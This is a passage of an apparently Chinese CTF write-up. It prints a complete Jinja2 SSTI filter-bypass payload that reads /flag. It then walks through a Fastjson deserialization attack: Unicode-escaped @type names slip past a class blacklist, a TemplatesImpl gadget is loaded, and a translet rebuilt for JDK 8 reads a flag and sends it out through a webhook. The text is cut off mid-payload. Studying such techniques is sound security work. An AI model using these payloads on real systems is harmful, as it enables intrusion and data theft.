]]<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd4\u56de\u7ed3\u679c\u4e2d\u53ef\u4ee5\u770b\u5230\u6839\u76ee\u5f55\u5b58\u5728\uff1a &#8216;flag&#8217;<\/p>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"4-\u8bfb\u53d6-flag\">4. \u8bfb\u53d6 <code>\/flag<\/code><\/h5>\n\n\n\n<p class=\"wp-block-paragraph\">\u6700\u7ec8 payload\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>    &#91;&#91; (((lipsum|attr('_'~'_'~'glo'~'bals'~'_'~'_')).get('_'~'_'~'buil'~'tins'~'_'~'_')).get('open'))(((lipsum|attr('_'~'_'~'glo'~'bals'~'_'~'_')).get('_'~'_'~'buil'~'tins'~'_'~'_')).get('chr')(47) ~ ((lipsum|attr('_'~'_'~'glo'~'bals'~'_'~'_')).get('_'~'_'~'buil'~'tins'~'_'~'_')).get('chr')(102) ~ ((lipsum|attr('_'~'_'~'glo'~'bals'~'_'~'_')).get('_'~'_'~'buil'~'tins'~'_'~'_')).get('chr')(108) ~ ((lipsum|attr('_'~'_'~'glo'~'bals'~'_'~'_')).get('_'~'_'~'buil'~'tins'~'_'~'_')).get('chr')(97) ~ ((lipsum|attr('_'~'_'~'glo'~'bals'~'_'~'_')).get('_'~'_'~'buil'~'tins'~'_'~'_')).get('chr')(103))|attr('read')() ]]<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u6700\u7ec8\u5f97\u5230\uff1a<code>FLAG{87b46c9d-57ee-4dea-b819-6cd172ea7f84}<\/code><\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"\u8bb0\u4f4f\u6211-\u4e5f\u8bb0\u4f4f\u5377\u5b97\">\u8bb0\u4f4f\u6211\uff0c\u4e5f\u8bb0\u4f4f\u5377\u5b97<\/h3>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\">\u4e91\u575e\u5f52\u6863\u4e2d\u5fc3\u6700\u8fd1\u4e0a\u7ebf\u4e86\u8fde\u63a5\u5668\u5de1\u68c0\u529f\u80fd\uff0c\u7528\u6765\u9884\u89c8\u4f4e\u4ee3\u7801\u6a21\u677f\u548c\u68c0\u67e5\u5916\u90e8\u5f52\u6863\u63a5\u53e3\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e3a\u4e86\u65b9\u4fbf\u5ba1\u8ba1\u7ec8\u7aef\u957f\u671f\u503c\u5b88\uff0c\u7cfb\u7edf\u8fd8\u5f00\u542f\u4e86\u201c\u8bb0\u4f4f\u767b\u5f55\u72b6\u6001\u201d\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8bbf\u5ba2\u8d26\u53f7\u5df2\u7ecf\u5f00\u653e\u7ed9\u4f60\uff1a<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">guest \/ guest2026<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8bf7\u8bc4\u4f30\u8fd9\u4e2a\u5f52\u6863\u7cfb\u7edf\u7684\u5b89\u5168\u98ce\u9669\u3002\u8bd5\u8bd5\u80fd\u4e0d\u80fd\u627e\u5230\u79d8\u5bc6<\/p>\n<\/blockquote>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u4e00-\u521d\u59cb\u89c2\u5bdf\">\u4e00\u3001\u521d\u59cb\u89c2\u5bdf<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u76ee\u6807\u7ad9\u70b9\u662f\u4e00\u4e2a\u76f4\u63a5\u53ef\u8bbf\u95ee\u7684\u5f52\u6863\u4e2d\u5fc3: <code>http:\/\/8080-a998cc25-435c-465c-bab1-5ef6788ab04a.challenge.ctfplus.cn\/<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u9996\u9875\u5728\u672a\u767b\u5f55\u72b6\u6001\u4e0b\u5c31\u80fd\u770b\u5230\u660e\u663e\u7684\u4e1a\u52a1\u7ed3\u6784:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u54c1\u724c\u540d\u662f <code>\u4e91\u575e\u5f52\u6863\u4e2d\u5fc3<\/code><\/li>\n\n\n\n<li>\u526f\u6807\u9898\u662f <code>\u6d41\u7a0b\u6863\u6848\u4e0e\u5916\u90e8\u8fde\u63a5\u5668\u8fd0\u7ef4\u53f0<\/code><\/li>\n\n\n\n<li>\u53f3\u4fa7\u5de5\u4f5c\u533a\u91cc\u6709\u4e00\u5757 <code>\u8fde\u63a5\u5668\u6a21\u677f\u9884\u89c8<\/code><\/li>\n\n\n\n<li>\u65c1\u8fb9\u8fd8\u7279\u610f\u6807\u4e86\u4e00\u4e2a\u5b57\u6837: <code>legacy parser<\/code><\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u9ed8\u8ba4\u6a21\u677f\u5185\u5bb9\u4e5f\u5f88\u6709\u4fe1\u606f\u91cf:<code>{\"name\":\"\u5ba1\u8ba1\u6750\u6599\u540c\u6b65\",\"endpoint\":\"internal:\/\/archive\/audit\",\"mode\":\"render\"}<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u4e2a\u9ed8\u8ba4\u503c\u5df2\u7ecf\u5728\u6697\u793a\u51e0\u4ef6\u4e8b:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u540e\u7aef\u4f1a\u5904\u7406\u4e00\u6bb5\u5b8c\u6574 JSON<\/li>\n\n\n\n<li>\u5b58\u5728\u5185\u90e8\u534f\u8bae\u5f62\u5f0f\u7684 endpoint<\/li>\n\n\n\n<li>\u7cfb\u7edf\u91cc\u6709\u201c\u65e7\u89e3\u6790\u5668\u201d\u4ecd\u5728\u670d\u5f79<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u7c7b\u9875\u9762\u4e0d\u662f\u90a3\u79cd\u53ea\u6709\u4e00\u4e2a\u767b\u5f55\u6846\u7684\u7a7a\u58f3\u7ad9\uff0c\u800c\u662f\u4ece UI \u5c42\u5c31\u5df2\u7ecf\u628a\u653b\u51fb\u9762\u534a\u66b4\u9732\u51fa\u6765\u4e86\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u4e8c-rememberme-\u8fd9\u6761\u7ebf\u7d22\u610f\u5473\u7740\u4ec0\u4e48\">\u4e8c\u3001<code>rememberMe<\/code> \u8fd9\u6761\u7ebf\u7d22\u610f\u5473\u7740\u4ec0\u4e48<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u9898\u76ee\u63cf\u8ff0\u660e\u786e\u8bf4\u7cfb\u7edf\u5f00\u542f\u4e86\u201c\u8bb0\u4f4f\u767b\u5f55\u72b6\u6001\u201d\uff0c\u8fd9\u4e0d\u662f\u4e00\u53e5\u5e9f\u8bdd\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f7f\u7528\u8bbf\u5ba2\u8d26\u53f7\u767b\u5f55\u540e: guest \/ guest2026<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u54cd\u5e94\u5934\u4f1a\u8fd4\u56de\u957f\u6548 <code>rememberMe<\/code> Cookie\u3002\u800c\u63a5\u53e3 <code>\/api\/session<\/code> \u7684\u8fd4\u56de\u683c\u5f0f\u4e5f\u975e\u5e38\u76f4\u767d: {&#8220;principal&#8221;:&#8221;guest&#8221;,&#8221;authenticated&#8221;:false,&#8221;remembered&#8221;:true}<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u4e00\u6b65\u81f3\u5c11\u8bf4\u660e\u4e09\u4ef6\u4e8b:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u7cfb\u7edf\u786e\u5b9e\u533a\u5206 <code>authenticated<\/code> \u548c <code>remembered<\/code><\/li>\n\n\n\n<li>\u540e\u7aef\u662f\u5178\u578b Java \u4f1a\u8bdd\u8bed\u4e49<\/li>\n\n\n\n<li>\u201c\u8bb0\u4f4f\u6211\u201d\u4e0d\u662f\u88c5\u9970\u6027\u529f\u80fd\uff0c\u800c\u662f\u8fdb\u5165\u5b9e\u9645\u9274\u6743\u6d41\u7a0b\u7684\u4e00\u90e8\u5206<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u672c\u5730\u5206\u6790\u8fc7\u7a0b\u91cc\u4e5f\u4fdd\u7559\u4e86\u5927\u91cf\u56f4\u7ed5 <code>rememberMe<\/code> \u7684\u63a2\u6d4b\u75d5\u8ff9:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>remember.txt<\/code><\/li>\n\n\n\n<li><code>cookies_true.txt<\/code><\/li>\n\n\n\n<li><code>DecryptRememberMe.java<\/code><\/li>\n\n\n\n<li><code>DecryptRememberMe2.java<\/code><\/li>\n\n\n\n<li><code>ShiroKeyProbe.java<\/code><\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u4e9b\u4fe1\u606f\u5171\u540c\u6307\u5411\u4e00\u4e2a\u5f88\u81ea\u7136\u7684\u5224\u65ad:<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\">\u8fd9\u9898\u6545\u610f\u628a\u9009\u624b\u7684\u7b2c\u4e00\u53cd\u5e94\u5f80 <code>Shiro rememberMe<\/code> \u65b9\u5411\u5e26\u3002<\/p>\n<\/blockquote>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f46\u7ee7\u7eed\u5f80\u4e0b\u505a\u4f1a\u53d1\u73b0\uff0c<code>rememberMe<\/code> \u66f4\u50cf\u662f\u4e00\u5c42\u9898\u9762\u5f15\u5bfc\u548c\u73af\u5883\u63d0\u793a\uff0c\u800c\u4e0d\u662f\u6700\u7ec8\u62ff flag \u7684\u843d\u70b9\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5b83\u544a\u8bc9\u6211\u4eec:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u8fd9\u662f Java \u751f\u6001<\/li>\n\n\n\n<li>\u7cfb\u7edf\u91cc\u5b58\u5728\u201c\u957f\u671f\u517c\u5bb9\u201d\u601d\u8def<\/li>\n\n\n\n<li>\u5f00\u53d1\u98ce\u683c\u504f\u5411\u201c\u529f\u80fd\u80fd\u8dd1\u5c31\u5148\u7559\u7740\u201d<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u800c\u771f\u6b63\u80fd\u628a\u79d8\u5bc6\u62d6\u51fa\u6765\u7684\uff0c\u662f\u53e6\u5916\u4e00\u5757\u540c\u6837\u5e26\u7740\u201c\u517c\u5bb9\u5473\u9053\u201d\u7684\u529f\u80fd\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u4e09-\u771f\u6b63\u7684\u6838\u5fc3\u63a5\u53e3-api-integration-preview\">\u4e09\u3001\u771f\u6b63\u7684\u6838\u5fc3\u63a5\u53e3: <code>\/api\/integration\/preview<\/code><\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u524d\u7aef\u811a\u672c <code>\/js\/app.js<\/code> \u975e\u5e38\u8bda\u5b9e\uff0c\u76f4\u63a5\u66b4\u9732\u4e86\u51e0\u4e2a\u5173\u952e\u63a5\u53e3: GET \/api\/dashboard GET \/api\/records POST \/api\/integration\/preview<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5176\u4e2d\u51b3\u5b9a\u6574\u9898\u8d70\u5411\u7684\uff0c\u662f\u8fd9\u4e2a: <code>POST \/api\/integration\/preview<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5411\u5b83\u53d1\u9001\u6700\u666e\u901a\u7684\u4e1a\u52a1\u6570\u636e:<code>{\"name\":\"\u5ba1\u8ba1\u6750\u6599\u540c\u6b65\",\"endpoint\":\"internal:\/\/archive\/audit\",\"mode\":\"render\"}<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd4\u56de\u7ed3\u679c\u4f1a\u51fa\u73b0\u4e00\u4e2a\u975e\u5e38\u5173\u952e\u7684\u5b57\u6bb5:<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>    {\n      \"rendered\":\"{\\\"mode\\\":\\\"render\\\",\\\"endpoint\\\":\\\"internal:\/\/archive\/audit\\\",\\\"name\\\":\\\"\u5ba1\u8ba1\u6750\u6599\u540c\u6b65\\\"}\",\n      \"parser\":\"fastjson-compat\",\n      \"ok\":true\n    }<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><code>fastjson-compat<\/code> \u56db\u4e2a\u5b57\u51e0\u4e4e\u5df2\u7ecf\u628a\u653b\u51fb\u65b9\u5411\u5199\u660e\u4e86\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u4e0d\u662f\u5355\u7eaf\u7684\u6a21\u677f\u62fc\u63a5\uff0c\u4e5f\u4e0d\u662f\u666e\u901a\u56de\u663e\u63a5\u53e3\u3002\u5b83\u662f\u4e00\u4e2a\u201c\u5148\u6309\u517c\u5bb9\u6a21\u5f0f\u89e3\u6790\u5bf9\u8c61\uff0c\u518d\u628a\u7ed3\u679c\u6e32\u67d3\u51fa\u6765\u201d\u7684\u5165\u53e3\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u800c\u4e00\u65e6\u540e\u7aef\u771f\u7684\u4fdd\u7559\u4e86 Fastjson \u98ce\u683c\u7684\u7c7b\u578b\u80fd\u529b\uff0c\u540e\u9762\u7684\u601d\u8def\u5c31\u5f88\u6e05\u695a\u4e86:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u8bd5\u63a2 <code>@type<\/code><\/li>\n\n\n\n<li>\u5224\u65ad\u662f\u5426\u5b9e\u4f8b\u5316\u5bf9\u8c61<\/li>\n\n\n\n<li>\u5224\u65ad\u6709\u6ca1\u6709\u9ad8\u5371\u7c7b\u540d\u8fc7\u6ee4<\/li>\n\n\n\n<li>\u8bc4\u4f30\u80fd\u5426\u6253\u5230\u771f\u5b9e\u53cd\u5e8f\u5217\u5316\u6267\u884c\u9762<\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u56db-\u9a8c\u8bc1\u5229\u7528\u9762\">\u56db\u3001\u9a8c\u8bc1\u5229\u7528\u9762<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u56f4\u7ed5 <code>\/api\/integration\/preview<\/code> \u7ee7\u7eed\u6d4b\u8bd5\u540e\uff0c\u53ef\u4ee5\u9010\u6b65\u786e\u8ba4:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u63a5\u53e3\u4f1a\u5904\u7406\u5b8c\u6574 JSON \u5bf9\u8c61<\/li>\n\n\n\n<li>\u5b58\u5728\u7c7b\u578b\u89e3\u6790\u8ff9\u8c61<\/li>\n\n\n\n<li>\u80fd\u8bc6\u522b <code>@type<\/code><\/li>\n\n\n\n<li>\u67d0\u4e9b\u5bf9\u8c61\u4f1a\u88ab\u5b9e\u4f8b\u5316<\/li>\n\n\n\n<li>\u6709\u4e00\u5c42\u201c\u5371\u9669\u5173\u952e\u5b57\u201d\u7f51\u5173<\/li>\n\n\n\n<li>\u4f46\u8fd9\u5c42\u7f51\u5173\u66f4\u50cf\u5b57\u7b26\u4e32\u62e6\u622a\uff0c\u800c\u4e0d\u662f\u4ece\u6839\u4e0a\u5173\u95ed\u7c7b\u578b\u7cfb\u7edf<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u4e00\u6b65\u5f88\u5173\u952e\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u56e0\u4e3a\u5982\u679c\u5b83\u53ea\u662f\u666e\u901a\u767d\u540d\u5355\u6620\u5c04\uff0c\u90a3\u4e48\u540e\u9762\u6240\u6709\u53cd\u5e8f\u5217\u5316\u601d\u8def\u90fd\u4f1a\u76f4\u63a5\u6b7b\u6389\u3002\u4f46\u73b0\u5728\u7684\u60c5\u51b5\u662f:<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\">\u7c7b\u578b\u80fd\u529b\u8fd8\u5728\uff0c\u53ea\u662f\u5916\u56f4\u5305\u4e86\u4e00\u5c42\u5e76\u4e0d\u5f7b\u5e95\u7684\u8fc7\u6ee4\u3002<\/p>\n<\/blockquote>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u5c31\u610f\u5473\u7740\u6574\u9898\u5df2\u7ecf\u4ece\u201c\u4e1a\u52a1\u89c2\u5bdf\u201d\u8fdb\u5165\u201c\u5229\u7528\u6784\u9020\u201d\u9636\u6bb5\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u4e94-\u7b2c\u4e00\u5c42\u7a81\u7834-unicode-\u7ed5\u8fc7\u5371\u9669\u7c7b\u540d\u62e6\u622a\">\u4e94\u3001\u7b2c\u4e00\u5c42\u7a81\u7834: Unicode \u7ed5\u8fc7\u5371\u9669\u7c7b\u540d\u62e6\u622a<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u63a5\u53e3\u4f1a\u660e\u663e\u62e6\u4e00\u4e9b\u9ad8\u5371\u7c7b\u540d\uff0c\u4f8b\u5982:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>TemplatesImpl<\/code><\/li>\n\n\n\n<li><code>TrAXFilter<\/code><\/li>\n\n\n\n<li><code>BeanComparator<\/code><\/li>\n\n\n\n<li class=\"has-medium-font-size\"><code>InvokerTransformer<\/code><\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f46\u95ee\u9898\u5728\u4e8e\uff0c\u5b83\u62e6\u7684\u662f\u201c\u660e\u6587\u5173\u952e\u5b57\u201d\uff0c\u4e0d\u662f\u6700\u7ec8\u8bed\u4e49\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u56e0\u6b64\u628a\u5173\u952e\u5b57\u6bb5\u4e0e\u7c7b\u540d\u90fd\u5199\u6210 Unicode \u8f6c\u4e49\u4e4b\u540e\uff0c\u8fc7\u6ee4\u5c31\u53ef\u4ee5\u88ab\u7ed5\u8fc7\u3002\u6700\u5c0f\u5316\u793a\u610f\u5982\u4e0b:<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>    {\n      \"\\u0040type\":\"\\u0063\\u006f\\u006d\\u002e\\u0073\\u0075\\u006e\\u002e...\"\n    }<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u4e00\u6b65\u4e4b\u540e\uff0c\u771f\u6b63\u91cd\u8981\u7684\u91cc\u7a0b\u7891\u662f:<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\"><code>com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl<\/code> \u6210\u529f\u88ab\u5b9e\u4f8b\u5316\u3002<\/p>\n<\/blockquote>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e00\u65e6\u8fd9\u4e00\u70b9\u88ab\u786e\u8ba4\uff0c\u8bf4\u660e\u540e\u7aef\u7684\u201clegacy parser\u201d\u4e0d\u662f\u5f92\u6709\u5176\u540d\uff0c\u5b83\u662f\u771f\u7684\u628a\u5371\u9669 Java \u7c7b\u5e26\u8fdb\u4e86\u8fd0\u884c\u671f\u5bf9\u8c61\u56fe\u91cc\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u516d-\u4e3a\u4ec0\u4e48\u4e00\u5f00\u59cb\u59cb\u7ec8\u4e0d\u51fa\u7f51\">\u516d\u3001\u4e3a\u4ec0\u4e48\u4e00\u5f00\u59cb\u59cb\u7ec8\u4e0d\u51fa\u7f51<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u8d70\u5230\u8fd9\u91cc\uff0c\u9898\u76ee\u770b\u8d77\u6765\u5df2\u7ecf\u63a5\u8fd1\u7ed3\u675f\u3002\u4f46\u771f\u6b63\u6700\u5bb9\u6613\u5361\u4eba\u7684\u5730\u65b9\uff0c\u6070\u597d\u5c31\u5728\u8fd9\u4e00\u6bb5\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u6700\u521d\u65e0\u8bba\u662f\u5c1d\u8bd5:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>TrAXFilter<\/code> \u89e6\u53d1<\/li>\n\n\n\n<li><code>outputProperties<\/code> \u89e6\u53d1<\/li>\n\n\n\n<li>\u5176\u4ed6\u6a21\u677f\u94fe\u5305\u88c5\u65b9\u5f0f<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u73b0\u8c61\u90fd\u975e\u5e38\u63a5\u8fd1:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u63a5\u53e3\u62a5 <code>JSONException<\/code><\/li>\n\n\n\n<li>\u770b\u8d77\u6765\u50cf\u662f\u5df2\u7ecf\u6253\u4e2d\u4e86<\/li>\n\n\n\n<li>\u4f46\u6076\u610f\u903b\u8f91\u59cb\u7ec8\u6ca1\u6709\u771f\u6b63\u6267\u884c\u6210\u529f<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u5982\u679c\u53ea\u76ef\u7740 gadget \u5f62\u72b6\uff0c\u5f88\u5bb9\u6613\u5f97\u51fa\u9519\u8bef\u7ed3\u8bba:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u94fe\u6761\u4e0d\u5bf9<\/li>\n\n\n\n<li>getter \u6ca1\u547d\u4e2d<\/li>\n\n\n\n<li>\u89e6\u53d1\u70b9\u9009\u9519\u4e86<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f46\u672c\u9898\u771f\u6b63\u7684\u95ee\u9898\uff0c\u4e0d\u5728\u5229\u7528\u94fe\u5f62\u72b6\uff0c\u800c\u5728\u8fd0\u884c\u65f6\u73af\u5883\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u4e03-\u771f\u6b63\u7684\u5751-\u8fdc\u7aef\u662f-jdk-8-\u672c\u5730-payload-\u5374\u662f-java-21\">\u4e03\u3001\u771f\u6b63\u7684\u5751: \u8fdc\u7aef\u662f JDK 8\uff0c\u672c\u5730 payload \u5374\u662f Java 21<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u901a\u8fc7\u526f\u4f5c\u7528\u6d41\u91cf\u53ef\u4ee5\u786e\u8ba4\u8fdc\u7aef Java \u8fdb\u7a0b\u7279\u5f81: Java\/1.8.0_482<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u800c\u6700\u5f00\u59cb\u585e\u8fdb <code>TemplatesImpl<\/code> \u7684\u6076\u610f translet class\uff0c<code>major version<\/code> \u662f: 65<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u4ee3\u8868 Java 21\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u95ee\u9898\u5230\u8fd9\u91cc\u5c31\u5b8c\u5168\u6e05\u695a\u4e86:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u672c\u5730\u751f\u6210\u7684\u6076\u610f\u7c7b\u5c5e\u4e8e Java 21<\/li>\n\n\n\n<li>\u8fdc\u7aef\u8fd0\u884c\u73af\u5883\u53ea\u6709 JDK 8<\/li>\n\n\n\n<li>JDK 8 \u53bb\u52a0\u8f7d Java 21 \u7684 class\uff0c\u5fc5\u7136\u5931\u8d25<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e8e\u662f\u624d\u4f1a\u51fa\u73b0\u4e00\u79cd\u975e\u5e38\u8ff7\u60d1\u7684\u5047\u8c61:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u7c7b\u578b\u80fd\u529b\u8fd8\u5728<\/li>\n\n\n\n<li><code>TemplatesImpl<\/code> \u4f3c\u4e4e\u5b9e\u4f8b\u5316\u6210\u529f<\/li>\n\n\n\n<li>\u63a5\u53e3\u4e5f\u786e\u5b9e\u629b\u5f02\u5e38\u4e86<\/li>\n\n\n\n<li>\u4f46\u771f\u6b63\u7684\u6076\u610f\u903b\u8f91\u5c31\u662f\u843d\u4e0d\u4e86\u5730<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u9898\u6700\u6709\u610f\u601d\u7684\u5730\u65b9\u5c31\u5728\u8fd9\u91cc\u3002<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\">\u5f88\u591a\u65f6\u5019\uff0c\u4e0d\u662f payload \u9519\u4e86\uff0c\u800c\u662f payload \u6240\u5c5e\u7684\u65f6\u4ee3\u9519\u4e86\u3002<\/p>\n<\/blockquote>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f60\u62ff\u4e00\u4e2a\u5c5e\u4e8e Java 21 \u7684\u7c7b\u53bb\u6253 Java 8\uff0c\u94fe\u518d\u6f02\u4eae\uff0c\u4e5f\u4e0d\u8fc7\u662f\u7eb8\u4e0a\u8c08\u5175\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u516b-\u4fee\u6b63\u601d\u8def-\u91cd\u65b0\u751f\u6210-java-8-\u517c\u5bb9\u6076\u610f\u7c7b\">\u516b\u3001\u4fee\u6b63\u601d\u8def: \u91cd\u65b0\u751f\u6210 Java 8 \u517c\u5bb9\u6076\u610f\u7c7b<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u65e2\u7136\u95ee\u9898\u51fa\u5728\u5b57\u8282\u7801\u7248\u672c\uff0c\u4fee\u6cd5\u5c31\u975e\u5e38\u660e\u786e:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u91cd\u65b0\u751f\u6210\u6076\u610f translet<\/li>\n\n\n\n<li>\u786e\u4fdd class \u6587\u4ef6\u662f Java 8 \u53ef\u52a0\u8f7d\u7248\u672c<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u4fee\u6b63\u540e\u7684 <code>major version<\/code>: 52<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e5f\u5c31\u662f JDK 8 \u53ef\u6b63\u5e38\u52a0\u8f7d\u7684\u5b57\u8282\u7801\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u6076\u610f\u7c7b\u903b\u8f91\u672c\u8eab\u4e0d\u590d\u6742\uff0c\u6838\u5fc3\u5c31\u662f\u4e09\u4ef6\u4e8b:<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u4f9d\u6b21\u5c1d\u8bd5\u8bfb\u53d6\u82e5\u5e72\u5019\u9009 flag \u8def\u5f84<\/li>\n\n\n\n<li>\u627e\u5230\u5185\u5bb9\u540e\u62fc\u63a5\u7ed3\u679c<\/li>\n\n\n\n<li>\u901a\u8fc7 webhook \u5916\u5e26\u56de\u4f20<\/li>\n<\/ol>\n\n\n\n<p class=\"wp-block-paragraph\">\u5c1d\u8bd5\u8fc7\u7684\u5178\u578b\u8def\u5f84\u5305\u62ec:<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>    \/flag\n    \/flag.txt\n    \/app\/flag\n    \/tmp\/flag\n    \/home\/ctf\/flag\n    \/root\/flag<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u6700\u7ec8\u786e\u8ba4\u6709\u6548\u8def\u5f84\u4e3a: \/tmp\/flag<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5230\u8fd9\u4e00\u6b65\uff0c\u6574\u4e2a\u94fe\u8def\u624d\u771f\u6b63\u4ece\u201c\u7406\u8bba\u80fd\u6253\u201d\u53d8\u6210\u201c\u8fdc\u7aef\u843d\u5730\u201d\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u4e5d-\u5173\u952e-payload-\u7ed3\u6784\">\u4e5d\u3001\u5173\u952e payload \u7ed3\u6784<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e3a\u4e86\u4e0d\u8ba9\u6574\u7bc7 WP \u88ab\u957f\u4e32 Base64 \u6df9\u6ca1\uff0c\u8fd9\u91cc\u53ea\u4fdd\u7559\u6700\u5173\u952e\u7684\u7ed3\u6784\u9aa8\u67b6\u3002<\/p>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"1-unicode-\u7ed5\u8fc7\u540e\u7684-templatesimpl\">1. Unicode \u7ed5\u8fc7\u540e\u7684 <code>TemplatesImpl<\/code><\/h5>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>{\n  